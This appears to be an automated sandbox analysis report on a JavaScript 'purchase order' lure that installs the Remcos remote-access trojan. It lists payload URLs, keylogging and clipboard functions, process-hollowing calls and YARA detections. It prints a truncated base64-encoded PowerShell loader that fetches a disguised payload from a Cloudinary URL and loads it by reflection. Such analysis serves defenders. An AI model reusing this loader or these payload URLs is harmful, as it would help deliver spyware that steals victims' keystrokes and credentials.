                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=8e832d08b03a8a30c06e
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=e13eef
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                      Source: wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/
                      Source: powershell.exe, 00000004.00000002.2940185943.00000233DC2E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v17
                      Source: powershell.exe, 00000006.00000002.2664729519.00000216801A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgp
                      Source: wscript.exe, 00000000.00000002.2993688674.00000137F3240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2374286860.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991573495.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992223390.00000137F1428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993443782.00000137F1429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991758949.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993888591.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992154625.00000137F141B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_
                      Source: wscript.exe, 00000000.00000002.2993537998.00000137F1495000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992132173.00000137F1493000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F1481000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992084729.00000137F1489000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992399181.00000137F15A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992223390.00000137F1428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992154625.00000137F141B000.00000004.00000020.00020000.00000000.sdmp, bhvFC84.tmp.11.drString found in binary or memory: https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: MSBuild.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.12:49719 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000 | 10_2_004099E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, | 11_2_0040987A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, | 11_2_004098E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, | 12_2_00406DFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, | 12_2_00406E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, | 13_2_004068B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, | 13_2_004072B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, | 10_2_00409B10
                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041BB77 SystemParametersInfoW, | 10_2_0041BB77

                      System Summary

                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
                      Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
                      Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_00417245
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,10_2_0041ACC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,10_2_0041ACED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00401806 NtdllDefWindowProc_W,11_2_00401806
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_004018C0 NtdllDefWindowProc_W,11_2_004018C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004016FD NtdllDefWindowProc_A,12_2_004016FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004017B7 NtdllDefWindowProc_A,12_2_004017B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00402CAC NtdllDefWindowProc_A,13_2_00402CAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00402D66 NtdllDefWindowProc_A,13_2_00402D66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_004158B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code functions (process 10): 10_2_0041D071, 10_2_004520D2, 10_2_0043D098, 10_2_00437150, 10_2_004361AA, 10_2_00426254, 10_2_00431377, 10_2_0043651C, 10_2_0041E5DF, 10_2_0044C739, 10_2_004367C6, 10_2_004267CB, 10_2_0043C9DD, 10_2_00432A49, 10_2_00436A8D, 10_2_0043CC0C, 10_2_00436D48, 10_2_00434D22, 10_2_00426E73, 10_2_00440E20, 10_2_0043CE3B, 10_2_00412F45, 10_2_00452F00, 10_2_00426FAD, 10_2_10017194, 10_2_1000B5C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code functions (process 11): 11_2_0044B040, 11_2_0043610D, 11_2_00447310, 11_2_0044A490, 11_2_0040755A, 11_2_0043C560, 11_2_0044B610, 11_2_0044D6C0, 11_2_004476F0, 11_2_0044B870, 11_2_0044081D, 11_2_00414957, 11_2_004079EE, 11_2_00407AEB, 11_2_0044AA80, 11_2_00412AA9, 11_2_00404B74, 11_2_00404B03, 11_2_0044BBD8, 11_2_00404BE5, 11_2_00404C76, 11_2_00415CFE, 11_2_00416D72, 11_2_00446D30, 11_2_00446D8B, 11_2_00406E8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code functions (process 12): 12_2_00405038, 12_2_0041208C, 12_2_004050A9, 12_2_0040511A, 12_2_0043C13A, 12_2_004051AB, 12_2_00449300, 12_2_0040D322, 12_2_0044A4F0, 12_2_0043A5AB, 12_2_00413631, 12_2_00446690, 12_2_0044A730, 12_2_004398D8, 12_2_004498E0, 12_2_0044A886, 12_2_0043DA09, 12_2_00438D5E, 12_2_00449ED0, 12_2_0041FE83, 12_2_00430F54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code functions (process 13): 13_2_004050C2, 13_2_004014AB, 13_2_00405133, 13_2_004051A4, 13_2_00401246, 13_2_0040CA46, 13_2_00405235, 13_2_004032C8, 13_2_00401689, 13_2_00402F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00433FB0 appears 55 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 004020E7 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 004338A5 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: String function: 00416760 appears 69 times
Source: PO_0099822111ORDER.js | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 4827
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
